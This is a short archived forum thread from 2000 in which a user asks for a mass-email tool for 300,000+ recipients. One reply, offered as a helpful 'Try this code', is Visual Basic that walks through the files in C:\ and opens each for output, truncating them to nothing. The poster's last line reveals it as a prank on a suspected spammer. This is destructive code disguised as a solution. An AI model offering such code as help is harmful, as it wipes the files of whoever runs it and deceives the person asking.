Click to See Complete Forum and Search --> : MassEmail


February 1st, 2000, 08:35 PM
Does anyone know of a great mass email solution that can handle 300,000+. Seems that once you get over 30,000 it starts to get crazy. Any help appreciated.

February 2nd, 2000, 02:57 AM
Why dont u go to http://www.killallspammers.com ;-)

Cakkie
February 2nd, 2000, 07:41 AM
Try this code

dim t as double
dim message as string
dim a as string
dim f as integer

a = dir("c:\*.*")

for t=1 to 300000

f = freefile
open a for output as #f
close #f
a = dir

next t



Now you wont have to worry about the 32000 limit, nor will the receivers of your junk...